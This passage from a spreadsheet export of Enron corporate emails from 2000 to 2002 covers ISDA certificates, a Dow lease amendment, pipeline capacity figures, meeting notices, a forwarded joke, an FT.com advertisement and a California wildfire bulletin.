		 To: "Dick D VARNER" &lt;Dick.Varner@EWEB.Eugene.OR.US&gt;@ENRON_x000D_
		 cc: Kimberly Hundl/Corp/Enron@Enron_x000D_
		 Subject: Re: Representations for ISDA Transaction_x000D_
_x000D_
Dick:_x000D_
_x000D_
I am suggesting a minor change to the "Power Risk Management Committee" _x000D_
certificate (to eliminate the reference to the Exhibit "A").  If we leave the _x000D_
reference in the certificate, you will always have to label the confirm as _x000D_
Exhibit "A" and resend the completed papers to us.  Please let me know if you _x000D_
are alright with this change.  If so, we ask that you please resend the _x000D_
certificate dated April 12, 2001.  If you do not wish to make the change, _x000D_
please resend the two certificates to which the confirmation labeled Exhibit _x000D_
"A" is attached._x000D_
_x000D_
Please call if you have any questions.  Thanks._x000D_
_x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	"Dick D VARNER" &lt;Dick.Varner@EWEB.Eugene.OR.US&gt;_x000D_
	04/12/2001 07:00 PM_x000D_
		 _x000D_
		 To: &lt;Sara.Shackleton@enron.com&gt;_x000D_
		 cc: &lt;Holli.Krebs@enron.com&gt;_x000D_
		 Subject: Re: Representations for ISDA Transaction_x000D_
_x000D_
_x000D_
Thanks, Sara.  No problem making the changes._x000D_
_x000D_
&gt;&gt;&gt; &lt;Sara.Shackleton@enron.com&gt; 04/12/01 01:56PM &gt;&gt;&gt;_x000D_
_x000D_
Dick:_x000D_
_x000D_
Attached are my comments to the certificates.  We will need to attach the_x000D_
form of confirmation to be certain that each particular transaction is_x000D_
authorized.  Let me know if you have any questions.  Thanks._x000D_
_x000D_
(See attached file: EWEBISDA Confirm RepresentationsR1.doc)_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
                    "Dick D VARNER"_x000D_
                    &lt;Dick.Varner@EWEB.Eug        To:     _x000D_
&lt;sara.shackleton@enron.com&gt;_x000D_
                    ene.OR.US&gt;                   cc:     _x000D_
&lt;Holli.Krebs@enron.com&gt;, "Bert I DUNN"_x000D_
                                                 &lt;Bert.Dunn@EWEB.Eugene.OR.US&gt;_x000D_
                    04/12/2001 11:09 AM          Subject:     Representations _x000D_
for ISDA Transaction_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Attached are drafts of two certificates which I believe will satisfy you_x000D_
needs.  Please get back to me with any comments._x000D_
_x000D_
(See attached file: ISDA Confirm Representations)_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Sep 2001 11:40:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'djack@keyad.com'})</t>
  </si>
  <si>
    <t>Greg or Darrell:_x000D_
_x000D_
Did you get an official rejection or invitation on the New Braunfels project?_x000D_
_x000D_
Phillip</t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 17:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'olivier.herbelot@enron.com', 'stinson.gibner@enron.com', 'grant.masson@enron.com', 'zimin.lu@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Real options article</t>
  </si>
  <si>
    <t>Guys_x000D_
_x000D_
Please find attached my submission to the conference proceedings, at which I _x000D_
gave my recent real options talk._x000D_
_x000D_
The volume will be published by the American Institute of Physics in the new _x000D_
year, as part of the volume on complex and disordered systems._x000D_
_x000D_
(If you don't have a postscript reader I'll need to send you a paper copy.)_x000D_
_x000D_
Steve</t>
  </si>
  <si>
    <t>Mon, 31 Dec 2001 08:22:27 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Dow Amendment</t>
  </si>
  <si>
    <t xml:space="preserve">Stuart,  I have reviewed your comments and incorporated as appropriate.  Please review attached.  The following are my comments on your changes that I did not accept:_x000D_
_x000D_
1.  The replacement of Section 3.1 and 3.2 with Section (a), (b), etc.  is confusing, but unfortunately the September 1, 2000 amendment already made this replacement.  I am  staying with that format._x000D_
_x000D_
2.  Since the Original Agreement was awkardly amended in September of 2000, I think the references to the "Original Agreement as amended by Amendment #2" are helpful, so l retained them._x000D_
_x000D_
Let me know if you have any questions.  I am OK to send this to Dow if you are._x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Zisman, Stuart  _x000D_
Sent:	Friday, December 28, 2001 3:13 PM_x000D_
To:	Nemec, Gerald; Redmond, Brian_x000D_
Subject:	RE: Dow Amendment_x000D_
_x000D_
Attached are my comments.  Obviously, I haven't reviewed the original lease so I am providing comments from a less than optimal vantage point._x000D_
_x000D_
Regards_x000D_
_x000D_
Stuart_x000D_
_x000D_
_x000D_
 &lt;&lt; File: Dow Lease SRZ Comments.doc &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nemec, Gerald  _x000D_
Sent:	Friday, December 28, 2001 11:51 AM_x000D_
To:	Zisman, Stuart; Redmond, Brian_x000D_
Subject:	Dow Amendment_x000D_
_x000D_
Attached is a draft of the Dow Amendment.  I used portions of their proposed amendment which they sent of August 8.  Date and prices are left blank for negotiation.  Let me know if you have any questions._x000D_
_x000D_
 &lt;&lt; File: Dow Amd.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 03:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sheila.tweed@enron.com', 'suzanne.adams@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>Fw: Fw: women - I just couldn't resist!!!!!!!!!!!</t>
  </si>
  <si>
    <t xml:space="preserve">This is from my daughter._x000D_
_x000D_
ckm_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 11/29/2000 11:43 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Paige Record &lt;recordp@southwestern.edu&gt; on 11/29/2000 11:35:41 AM_x000D_
To: mabrya@southwestern.edu, ahrendtb@southwestern.edu, dyellow02@yahoo.com, _x000D_
abbey_leachman@baylor.edu, Kay.Mann@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Fw: Fw: women - I just couldn't resist!!!!!!!!!!!_x000D_
_x000D_
&gt;From: "Jennifer Page" &lt;pagej@southwestern.edu&gt;_x000D_
&gt;To: &lt;westfahj@southwestern.edu&gt;, "Persis Mehta" &lt;mehtap@southwestern.edu&gt;,_x000D_
&gt;        "Paige Record" &lt;recordp@southwestern.edu&gt;,_x000D_
&gt;        "Kristine Pavlesic" &lt;kpav@houston.rr.com&gt;,_x000D_
&gt;        "Kelly Laabs" &lt;laabsk@southwestern.edu&gt;,_x000D_
&gt;        "Jessica Page" &lt;jessipage@hotmail.com&gt;, &lt;gomezp@southwestern.edu&gt;,_x000D_
&gt;        "Emily House" &lt;housee@southwestern.edu&gt;_x000D_
&gt;Subject: Fw: Fw: women - I just couldn't resist!!!!!!!!!!!_x000D_
&gt;Date: Wed, 29 Nov 2000 11:26:50 -0600_x000D_
&gt;X-MSMail-Priority: Normal_x000D_
&gt;X-Mailer: Microsoft Outlook Express 5.00.2615.200_x000D_
&gt;X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;&gt; &gt; &gt;_x000D_
&gt;&gt; &gt; &gt;&gt;    A Thought For Christmas_x000D_
&gt;&gt; &gt; &gt;&gt;        Do you know what would have happened_x000D_
&gt;&gt; &gt; &gt;&gt;      If it had been Three Wise Women_x000D_
&gt;&gt; &gt; &gt;&gt;        Instead of Three Wise Men?_x000D_
&gt;&gt; &gt; &gt;&gt;_x000D_
&gt;&gt; &gt; &gt;&gt;        They would have asked directions,_x000D_
&gt;&gt; &gt; &gt;&gt;       Arrived on time,_x000D_
&gt;&gt; &gt; &gt;&gt;      Helped deliver the baby,_x000D_
&gt;&gt; &gt; &gt;&gt;         Cleaned the stable,_x000D_
&gt;&gt; &gt; &gt;&gt;        Made a casserole,_x000D_
&gt;&gt; &gt; &gt;&gt;         Brought practical gifts and_x000D_
&gt;&gt; &gt; &gt;&gt;        There would be Peace On Earth._x000D_
&gt;&gt; &gt; &gt;&gt;_x000D_
&gt;&gt; &gt; &gt;&gt;  Pass it on to the wise women in your life!_x000D_
&gt;&gt; &gt; &gt;_x000D_
&gt;&gt; &gt; &gt;_x000D_
&gt;&gt; &gt; &gt;_x000D_
&gt;&gt; &gt; &gt;_x000D_
&gt;&gt; &gt; &gt;_x000D_
&gt;&gt; &gt; &gt;________________________________________________________x000D_
&gt;&gt; &gt; &gt;Tired of slow Internet? Get @Home Broadband Internet_x000D_
&gt;&gt; &gt; &gt;http://www.home.com/xinbox/signup.html_x000D_
&gt;&gt; &gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;_____________________________________________________________________________x000D_
&gt;__________x000D_
&gt;&gt; Get more from the Web.  FREE MSN Explorer download :_x000D_
&gt;http://explorer.msn.com_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 21:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ft.com.special@newsbyemail.ft.com'})</t>
  </si>
  <si>
    <t>frozenset({'&lt;"ft.com.users":@enron.com&gt;'})</t>
  </si>
  <si>
    <t>Exclusive Holiday Offers from Europe</t>
  </si>
  <si>
    <t>Dear FT.com User:_x000D_
_x000D_
Get a head start on your holiday shopping with these_x000D_
specialties from the most established and renowned retailers_x000D_
in Europe. For truly unique gifts, take a look at some of these_x000D_
exclusive offers at  FT.com:_x000D_
_x000D_
*** Longmire Cufflinks ***_x000D_
Independent London jeweller and designer of contemporary, classic_x000D_
or custom-made cufflinks. Warrants of Appointment: Her Majesty the_x000D_
Queen, The Queen Mother and Prince Phillip._x000D_
_x000D_
*** Liberty Fashions ***_x000D_
An eclectic mix of fashions and homewares united by a vision and_x000D_
taste that has thrived for 125 years.  Traditional materials used_x000D_
with modern flair have defined Liberty as a European stand-out._x000D_
_x000D_
*** Limited edition contemporary art prints from Eyestorm ***_x000D_
Prints from Andy Warhol, Jeff Koons and Helmut Newton to name a few_x000D_
at affordable prices._x000D_
_x000D_
*** Grays of Cheltenham Customized Gifts ***_x000D_
For the discerning customer, Grays offers treasures that you can personalize_x000D_
with initials or sentiments.  Choose from a range of traditional to unique_x000D_
goods including flasks, fountain pens, lighters, clocks, office gifts,_x000D_
chess sets, trophies, and collectibles._x000D_
_x000D_
_x000D_
This holiday season make sure all your gifts are originals, visit:_x000D_
http://specials.ft.com/timeoff/seasonsgreetings/_x000D_
_x000D_
Regards,_x000D_
FT.com_x000D_
_x000D_
-----------------------------------------------------------------_x000D_
Why not forward this e-mail to a friend or colleague who_x000D_
may find this information useful?_x000D_
_x000D_
If you no longer wish to receive further e-mails from FT.com,_x000D_
please send an e-mail to: ft.com.unsubscribe@newsbyemail.ft.com_x000D_
with the single word "unsubscribe" as the subject of the message._x000D_
Your name will then be removed from our mailing list._x000D_
_x000D_
If you have forgotten your password for FT.com, please visit:_x000D_
http://registration.ft.com/registration/passwordLookup.jsp</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 08:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>October 26 Corporate HR Leadership Team Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Andrea, would it be possible to update our list to show the current progress _x000D_
on the "30 days" items?  I think you have a better handle on the timelines _x000D_
than I would.  Thanks.  Michelle_x000D_
_x000D_
---------------------- Forwarded by Michelle Cash/HOU/ECT on 10/25/2000 03:38 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Gerry Gibson@ENRON_x000D_
10/25/2000 11:49 AM_x000D_
To: Andrea Yowman/Corp/Enron@ENRON, Brian Schaffer/Corp/Enron@ENRON, Kimberly _x000D_
Rizzi/HOU/ECT@ECT, Cynthia Barrow/HR/Corp/Enron@ENRON, Sheila _x000D_
Walton/HOU/ECT@ECT, Brad Coleman/HOU/ECT@ECT, Sarah A Davis/HOU/ECT@ECT, _x000D_
Laura Schwartz/Corp/Enron@Enron, Michelle Cash/HOU/ECT@ECT, Mary _x000D_
Joyce/HR/Corp/Enron@ENRON, Bob Sparger/Corp/Enron@Enron, Cindy _x000D_
Olson/Corp/Enron@ENRON, Gina Corteselli/Corp/Enron@Enron, Kathryn _x000D_
Schultea/HR/Corp/Enron@ENRON, Andrew Lawrence/HR/Corp/Enron@ENRON, Pam _x000D_
Butler/HR/Corp/Enron@ENRON, John Hay/Enron Communications@Enron _x000D_
Communications, Donald Miller/Corp/Enron@Enron, Dave Schafer/OTS/Enron@ENRON, _x000D_
Karen Moore/NA/Enron@ENRON_x000D_
cc: Hilda Bourgeois-Galloway/Corp/Enron@ENRON, Bobbie Power/Corp/Enron@ENRON _x000D_
Subject: October 26 Corporate HR Leadership Team Meeting_x000D_
_x000D_
Hi Folks:_x000D_
_x000D_
Enclosed is the agenda for the Corporate HR Leadership Team Meeting that will _x000D_
take place tomorrow in the Executive Board Room (50th Floor) from 9:00 to _x000D_
10:00. Please note...we will meet in the Board Room not the Dining room on _x000D_
the Mezzanine level... Our primary meeting objective will be to review where _x000D_
the team stands implementing the short term Action Plans for the Key Focus _x000D_
Areas established at the retreat. I understand that some very good work has _x000D_
been done and that several potential "Wows" are either currently being _x000D_
implemented or about to launch. _x000D_
_x000D_
We look forward to getting the latest status reports relative to _x000D_
accomplishing these critical activities and keeping the momentum flowing._x000D_
_x000D_
Regards, Gerry Gibson_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 08:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'meredith.mitchell@enron.com', 'cynthia.franklin@enron.com'})</t>
  </si>
  <si>
    <t>Tetco MDQ's</t>
  </si>
  <si>
    <t xml:space="preserve">k#  MDQ  Delivery Receipt_x000D_
894027  8000  M2  Access (this is less than the MDQ for now)_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 09/29/2000 03:47 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
09/29/2000 03:44 PM_x000D_
To: Meredith Mitchell/HOU/ECT@ECT, Cynthia Franklin/Corp/Enron@ENRON_x000D_
cc: Scott Goodell/Corp/Enron@ENRON, Judy Townsend/HOU/ECT@ECT _x000D_
Subject: Tetco MDQ's_x000D_
_x000D_
 _x000D_
_x000D_
Tetco MDQ's for OCT_x000D_
_x000D_
k#  MDQ  Delivery Receipt_x000D_
892510  16136  M3  Access (same as last month)_x000D_
892511  7500  M3  Access (same as last month)_x000D_
893145  5000  M3  Access (same as last month)_x000D_
892875  9400  M3  Access (same as last month)_x000D_
_x000D_
892872  19355  M2  Access (same as last month - this # may be too high)_x000D_
894029  5000  M2  Access (new)_x000D_
894028  5000  M2  ELA (new)_x000D_
_x000D_
VNGk#_x000D_
830015  10555  M2  Access (MDQ is higher but only use 10,555 dth)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 11 Aug 2001 06:58:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.donahue@enron.com'})</t>
  </si>
  <si>
    <t>Jeff:_x000D_
_x000D_
I spoke with Ken Karas with regards to his interest in Enron Wind and informed him that I would contact him if it made sense to do so in the future._x000D_
_x000D_
Jeff Donahue</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 09:33:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bart.burk@enron.com'})</t>
  </si>
  <si>
    <t>load forecast</t>
  </si>
  <si>
    <t xml:space="preserve">Bart,_x000D_
_x000D_
Just wanted to let you know that I just had access to the west region forecast data granted for the "gasintranet" ID.  When I get back to Houston Friday, we can set up the query for you to use._x000D_
_x000D_
Mat_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 06:13:42 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'jae.black@enron.com', 'jeff.king@enron.com', 'patrick.hanse@enron.com', 'dana.davis@enron.com', 'diana.allen@enron.com', '/o=enron/ou=na/cn=recipients/cn=notesaddr/cn=a478079f-55e1f3b0-862566fa-612229@enron.com', 'corry.bentley@enron.com', 'mauricio.marquez@enron.com', 'jeffrey.miller@enron.com', 'l..day@enron.com', 'eric.saibi@enron.com', 'rika.imai@enron.com', 'doug.gilbert-smith@enron.com', 'jason.kaniss@enron.com', 'gulay.soykok@enron.com', 'lloyd.will@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'larry.valderrama@enron.com', 'ted.ballinger@enron.com', 'jason.choate@enron.com', 'russell.ballato@enron.com', 'seung-taek.oh@enron.com', 'd..thomas@enron.com', 'ryan.williams@enron.com', 'peter.makkai@enron.com', 'carrie.larkworthy@enron.com', 'm..presto@enron.com', 'alan.chen@enron.com', 'michael.seely@enron.com', 'j..sturm@enron.com', 'claudia.guerra@enron.com', 'gustavo.giron@enron.com', 'debra.bailey@enron.com', 'mike.carson@enron.com', 'l..garcia@enron.com', 'steve.wang@enron.com', 'david.ryan@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'mark.symms@enron.com', 'robert.stalford@enron.com', 'robert.benson@enron.com', 'bryce.schneider@enron.com', 'willis.philip@enron.com'})</t>
  </si>
  <si>
    <t>Group Meeting</t>
  </si>
  <si>
    <t>There will be a Power Group Meeting this morning at 10am with Kevin Presto. Please plan to attend and I will let you know which conference room as soon as it has been assigned._x000D_
_x000D_
The dial in number is as follows:  _x000D_
INSTRUCTIONS_x000D_
1. All Participants Dial 1-800-711-8000 or 614-410-1515 for international participants_x000D_
2. All Participants and Chairperson Enter Access Code: 8539582 #_x000D_
_x000D_
_x000D_
Thank you,_x000D_
_x000D_
T.Jae Black_x000D_
East Power Trading_x000D_
Assistant to Kevin Presto_x000D_
off. 713-853-5800_x000D_
fax 713-646-8272_x000D_
cell 713-539-4760</t>
  </si>
  <si>
    <t>Fri, 22 Jun 2001 01:17:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tomasine.mayes@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'lisa.shoemake@enron.com', 'adriana.celedon@enron.com', 'a..allen@enron.com', 'karla.compean@enron.com', 'corry.bentley@enron.com', 'stacey.white@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'l..day@enron.com', 'rika.imai@enron.com', 'judy.martinez@enron.com', 'terri.clynes@enron.com', 'oscar.dalton@enron.com', 'heather.kroll@enron.com', 'john.llodra@enron.com', 'n..stewart@enron.com', 'c..aucoin@enron.com', 'janelle.scheuer@enron.com', 'larry.valderrama@enron.com', 'rahil.jafry@enron.com', 'harry.arora@enron.com', 'kayne.coulter@enron.com', 'jason.thompkins@enron.com', 'robert.wheeler@enron.com', 'chad.wood@enron.com', 'd..thomas@enron.com', 'david.fairley@enron.com', 'gerald.gilbert@enron.com', 'gary.justice@enron.com', 'jennifer.bagwell@enron.com', 'tom.dutta@enron.com', 'd..baughman@enron.com', 'm..presto@enron.com', 'chris.ahn@enron.com', 'mike.curry@enron.com', 'juan.hernandez@enron.com', 'william.abler@enron.com', 'billy.braddock@enron.com', 'drew.tingleaf@enron.com', 'larry.jester@enron.com', 'david.ryan@enron.com', 'don.baughman@enron.com', 'm..forney@enron.com', 'nick.politis@enron.com', 'elizabeth.johnston@enron.com', 'e..kelly@enron.com', 'david.marks@enron.com', 'doug.sewell@enron.com'})</t>
  </si>
  <si>
    <t>RE: Eservices Meeting</t>
  </si>
  <si>
    <t>Please can you make sure that when you mail Tom May you type his name correctly as I am still getting a lot of mails that are intended for him._x000D_
_x000D_
Thanks,_x000D_
Tomasine Mayes_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shoemake, Lisa  _x000D_
Sent:	21 June 2001 19:47_x000D_
To:	Presto, Kevin M.; Baughman, Edward D.; Clynes, Terri; Dalton III, Oscar; Sewell, Doug; Compean, Karla; Kelly, Mike E.; Justice, Gary; Valderrama, Larry; Abler, William; Llodra, John; Wood, Chad; Scheuer, Janelle; Marks, David; Stewart, Jennifer N.; Dutta, Tom; Wheeler, Robert; Politis, Nick; Thompkins, Jason; Kroll, Heather; Fairley, David; Johnston, Elizabeth; Braddock, Billy; Bagwell, Jennifer; Celedon, Adriana; Martinez, Judy; Jafry, Rahil; Tingleaf, Drew; Curry, Mike; Jester, Larry; Ahn, Chris; Baughman Jr., Don; Thomas, Paul D.; Hernandez, Juan; Forney, John M.; Bentley, Corry; Arora, Harry; Ryan, David; Imai, Rika; Comeaux, Keith; Mayes, Tomasine; Coulter, Kayne; Gilbert, Gerald; Miller, Jeffrey; Day, Smith L.; Allen, Thresa A.; White, Stacey; Aucoin, Berney C._x000D_
Cc:	Black, Tamara Jae; Harvey, Claudette; Rode, Tina_x000D_
Subject:	Eservices Meeting_x000D_
_x000D_
There will be an Eservices Meeting June 25, 2001 in EB30c1 from 3:00-3:30 with Kevin Presto and Tom May.  If you have any questions or I can be of further assistance please let me know._x000D_
_x000D_
Thank You_x000D_
Lisa x39194</t>
  </si>
  <si>
    <t>Thu, 23 Aug 2001 17:43:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'edis-by-email@incident.com'})</t>
  </si>
  <si>
    <t>[EDIS]  LOCAL FIRE CREWS HEADING HOME [News: Statewide]</t>
  </si>
  <si>
    <t xml:space="preserve">From: Governor's Office of Emergency Services_x000D_
_x000D_
SACRAMENTO - Hundreds of local fire crews that saved homes from being_x000D_
_x000D_
destroyed by wildfire this week are returning home today, after being_x000D_
_x000D_
released by the Governor's Office of Emergency Services. State OES_x000D_
engines will remain behind to finish what is hoped to be the final_x000D_
stages of this month's wildfire fight. _x000D_
_x000D_
Today, with the fires nearing full containment, OES began sending_x000D_
home local government engines from the Creek and North Fork fires._x000D_
Crews from the Leonard Fire will begin heading home tomorrow. The 261_x000D_
_x000D_
engines will continue to depart the scene in parades of five,_x000D_
scattered throughout the next several days, passing back across the_x000D_
freeways to the 51 counties from which they came (see attachment). _x000D_
_x000D_
Of the nine large wildfires that started this month, it was the Creek_x000D_
_x000D_
Fire, currently 85 percent contained, that dominated local government_x000D_
_x000D_
and State OES Mutual Aid resources. For six days, the Creek Fire_x000D_
roared across Tuolumne and Mariposa counties blackening 11,500 acres_x000D_
and threatening to engulf homes in numerous communities. At its peak_x000D_
deployment yesterday, OES had 260 engines and eight National Guard_x000D_
helicopters on the fires._x000D_
_x000D_
Among its duties, State OES dispatches local government and state_x000D_
fire fighting resources through the California Fire &amp; Rescue Mutual_x000D_
Aid System. The neighbor-helping-neighbor system is designed to_x000D_
assist the California Department of Forestry and Fire Protection,_x000D_
federal wildland fire agencies, and local departments. It is also_x000D_
ensures that additional resources are provided to local jurisdictions_x000D_
_x000D_
whenever their resources are committed or insufficient for a fire._x000D_
_x000D_
The OES Fire and Rescue Emergency Operations Center in Sacramento_x000D_
will remain activated 24-hours a day to coordinate statewide fire and_x000D_
_x000D_
rescue efforts. At the center are representatives from OES Executive_x000D_
Office, Law Enforcement Branch, Inland Region, and the California_x000D_
Department of Forestry and Fire Protection._x000D_
_x000D_
	_x000D_
- OES -_x000D_
_x000D_
Departments that sent fire engines to _x000D_
Creek, Leonard, and North Fork fires._x000D_
_x000D_
Creek Fire_x000D_
_x000D_
 North County FD_x000D_
Camp Pendleton FD_x000D_
El Dorado FPD_x000D_
Escondido FD (2)_x000D_
Deer Springs FD_x000D_
Encinitas FD_x000D_
San Marcos FPD_x000D_
Rancho Santa Fe FPD_x000D_
Vista FD/FPD_x000D_
_x000D_
Ventura County FD (5)_x000D_
_x000D_
Riverside FD (2)_x000D_
Corona FD_x000D_
Norco FD_x000D_
Riversdie County FD_x000D_
_x000D_
Compton FD_x000D_
Downey FD_x000D_
Montebello FD_x000D_
Santa Fe Springs FD_x000D_
Vernon FD_x000D_
_x000D_
Felton FPD_x000D_
Central FPD of Santa Cruz County (2)_x000D_
Aptos-La Selva (Beach) FD_x000D_
Santa Cruz FD_x000D_
Boulder Creek FPD_x000D_
_x000D_
Suisun City FD_x000D_
Fairfield FD_x000D_
Dixon FD_x000D_
Vacaville FD_x000D_
Vallejo FD_x000D_
_x000D_
Elk Grove CSD FD_x000D_
Folsom FD_x000D_
Sacramento FD_x000D_
Sacramento Metropolitan FD (2)_x000D_
_x000D_
Los Angeles City Fire Department (10)_x000D_
_x000D_
Oroville FD_x000D_
El Medio FPD_x000D_
Chico FD_x000D_
Paradise FD_x000D_
Butte CFD_x000D_
_x000D_
_x000D_
Watsonville FD_x000D_
Zayante FPD_x000D_
Scotts Valley FPD_x000D_
Branciforte FPD_x000D_
_x000D_
Santa Clara CFD(2)_x000D_
Moffett Field FD_x000D_
Palo Alto_x000D_
San Jose (3)_x000D_
Mountain View FD_x000D_
_x000D_
Milpitas FD_x000D_
Saratoga FPD_x000D_
Santa Clara FD_x000D_
_x000D_
Pebble Beach CSD _x000D_
Carmel Valley FPD_x000D_
Carmel by the Sea FD_x000D_
Salinas Rural FPD (2) _x000D_
Pacific Grove FD_x000D_
_x000D_
San Miguel FPD_x000D_
Milford FD_x000D_
Hillsborough FD_x000D_
Foster City FD_x000D_
Burlingame FD_x000D_
_x000D_
_x000D_
Lawrence Livermore Nat'l Lab. FD_x000D_
Livermore/Pleasanton FD_x000D_
Fremont FD_x000D_
Alameda CFD (2)_x000D_
_x000D_
Sausalito FD_x000D_
Southern Marin FPD_x000D_
Tiburon FPD_x000D_
Novato FPD_x000D_
Ross Valley FD_x000D_
_x000D_
Monterey FD_x000D_
Cachagua FPD_x000D_
North County FPD_x000D_
San Benito CFD_x000D_
_x000D_
El Centro FD_x000D_
Calipatria FD_x000D_
Imperial CFD_x000D_
Calexico FD_x000D_
Brawley FD_x000D_
_x000D_
Orange County Fire Authority (5)_x000D_
_x000D_
American Canyon FPD _x000D_
Calistoga FD_x000D_
St. Helena FD_x000D_
Napa CFD (2)_x000D_
_x000D_
Redlands FD (2)_x000D_
San Bernardino CFD (5)_x000D_
San Bernardino FD (2)_x000D_
_x000D_
San Diego Fire &amp; Life Safety Svcs. (2)_x000D_
Chula Vista FD _x000D_
Borana FD_x000D_
_x000D_
Bakersfield FD (4)_x000D_
California City FD_x000D_
_x000D_
El Cajon FD_x000D_
La Mesa FD_x000D_
Alpine FPD_x000D_
San Miguel Consolidated FPD (2)_x000D_
_x000D_
Santa Clara FD (2)_x000D_
Gilroy_x000D_
_x000D_
Jones Valley VFC_x000D_
Anderson FPD_x000D_
Bella Vista VFC_x000D_
Redding FD_x000D_
Shasta FD_x000D_
_x000D_
_x000D_
Leonard Fire_x000D_
_x000D_
Colusa FD_x000D_
Williams FPD_x000D_
Sacramento River FPD_x000D_
Marysville FD_x000D_
Maxwell FPD_x000D_
_x000D_
Sacramento Metro.  FD (2)_x000D_
Folsom Prison FNR_x000D_
Elk Grove CSD FD_x000D_
_x000D_
Stanislaus Consolidated Fire_x000D_
West Stanislaus CFPD_x000D_
Oakdale Rural FPD_x000D_
Oakdale FD_x000D_
Salida FD_x000D_
_x000D_
Orange County Fire Authority (5)_x000D_
_x000D_
Benicia FD_x000D_
Fairfield FD_x000D_
Cordelia FPD_x000D_
Vacaville FPD_x000D_
Rio Vista FD_x000D_
_x000D_
Sonoma FD_x000D_
Kenwood FPD_x000D_
Glen Ellen FPD_x000D_
Rancho Adobe FPD_x000D_
Bennett Valley FPD_x000D_
_x000D_
Fremont FD (2)_x000D_
Oakland FSA (3)_x000D_
Lawrence Livermore Nat'l Lab. FD_x000D_
_x000D_
Ripon FPD_x000D_
Escalon Consolidated FPD_x000D_
Liberty Rural FPD_x000D_
Clements Rural FPD_x000D_
_x000D_
Alameda FD_x000D_
Piedmont FD_x000D_
Lawrence/Berkeley Lab. FD_x000D_
_x000D_
Contra Costa CFPD_x000D_
Moroga FPD_x000D_
Richmond FD_x000D_
Oakley FPD_x000D_
San Ramon Valley FPD_x000D_
_x000D_
_x000D_
North Fork Fire_x000D_
_x000D_
Atwater FD_x000D_
Merced CFD (4)_x000D_
_x000D_
Orange Cove FPD_x000D_
Fresno	CFPD_x000D_
Reedley FD_x000D_
North Central FPD_x000D_
Fresno County FPD_x000D_
_x000D_
_x000D_
EDIS-08-23-01 1737 PDT_x000D_
_x000D_
_x000D_
---------------------------------------------------------_x000D_
To update or terminate your subscription to this email service_x000D_
visit our webpage at http://www.incident.com/edismail.html._x000D_
Please DO NOT reply to this message: replies may be treated as_x000D_
errors and result in your subscription being deleted.  For_x000D_
non-subscription queries, email &lt;edistrouble@incident.com&gt;. We_x000D_
cannot process subscription, unsubscribe or selection-change_x000D_
requests via email: please use the webpage for those requests._x000D_
_x000D_
EDIS is operated by the Governor's Office of Emergency Services, _x000D_
State of California. This email relay is offered by incident.com _x000D_
as a public service. Because of the complexity of this system and_x000D_
its dependence on other systems, we cannot be responsible for _x000D_
delays or failures in transmission. _x000D_
---------------------------------------------------------_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 05:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'wenyao.jia@enron.com', 'debbie.brackett@enron.com'})</t>
  </si>
  <si>
